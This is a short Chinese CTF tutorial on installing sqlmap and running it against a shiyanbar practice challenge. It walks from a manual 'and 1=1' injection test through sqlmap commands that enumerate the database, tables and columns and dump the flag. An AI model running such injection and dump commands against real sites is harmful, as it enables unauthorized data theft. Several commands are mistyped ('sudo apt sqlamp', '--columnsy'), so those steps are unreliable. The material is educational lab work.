使用的环境是Ubuntu系统
sqlmap的安装
sqlmap需要安装python2环境,python3不行(Ubuntu下默认安装python2)
输入命令:sudo apt sqlamp
检查是否安装成功
输入命令:sqlmap -help
返回下面结果即为成功。
sqlmap基本参数
sqlmap -h 查看帮助选项
is -dba 当前用户权限
dbs 所有数据库
current-db 网站当前数据库
users 所有数据库用户
current-user 当前数据库用户
tables 参数:列表名
columns 参数:字段名
dump 参数:下载数据
sqlmap牛刀小试
我们以这到题为例http://www.shiyanbar.com/ctf/33。
如果没有注册过实验吧的朋友先注册下实验吧
拿到题目我们判断下有没有sql注入
在url后面加上and 1=1,没有报错
加上and 1=2,报错。
说明有sql注入
第一步使用sqlmap查看数据库信息
输入命令:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db
经过一些时间成功爆出当前数据库为my_db,如果注入过程提示选择y或者n,一般是选择y。大概就是尝试更多的方法进行注入
第二步、爆出表名
输入命令:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
第三步爆字段名
输入命令:
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columnsy
第四步、爆数据
输入命令:
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
稍等片刻,成功找到flag:whatiMyD91dump